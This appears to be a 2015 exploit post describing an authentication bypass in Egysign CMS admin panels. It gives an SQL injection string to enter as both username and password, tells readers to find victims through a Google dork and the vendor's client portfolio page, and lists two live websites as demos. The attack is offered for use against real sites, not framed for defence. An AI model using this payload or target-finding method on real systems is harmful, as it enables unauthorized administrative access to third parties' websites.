facebook facebook twitter rss

Egysign CMS Authentication Bypass

Author: WH!T3 W01F , Published: 02-04-2015
# Exploit Title : Egysign CMS Authentication Bypass
# Date : 02/04/2015
# Exploit Author : WH!T3 W01F
# Contact : whit3_w01f@att.net
# Category : Web Application Bugs
# Home : Iran-Cyber.Org - Iran-Cyber.In
# Google Dork : intext:powered By Egysign
# Tested On : Windows

1. Description

By This Vulenarabity You Can Bypass Authentication And Get Logged In Like An Admin.

2. Proof Of Concept

You Can Find Targets By 2 Ways :

First Way :

Go To This Address : http://egysign.com/Portfolio.aspx

In That Address Are Many Targets.After You Selected Your Target Use This Exploit :

# http://site.com/admin

Then If The Admin Page Comes,Use These Usernames And Passwords :

Username : '=''or'
Password : '=''or'

Second Way :

Search This Dork : intext:powered By Egysign

Then Use This Exploit :

# http://site.com/admin

Then If The Admin Page Comes,Use These Usernames And Passwords :

Username : '=''or'
Password : '=''or'


# Demo :
# http://diverprofessional.co.uk/admin/
# http://www.injazsys.com/admin/
=========================================
Greetz : | root3r | MOHAMAD_NOFOZI | Sheytan Azzam | KamraN HellisH | JOK3R | Erfan Mig | Alireza_ProMis | Mr.Moein | Pi.Hack | CRYSIS | Siyahi |

Visit Us :

Iran-Cyber.Org - Iran-Cyber.In

Like us on Facebook :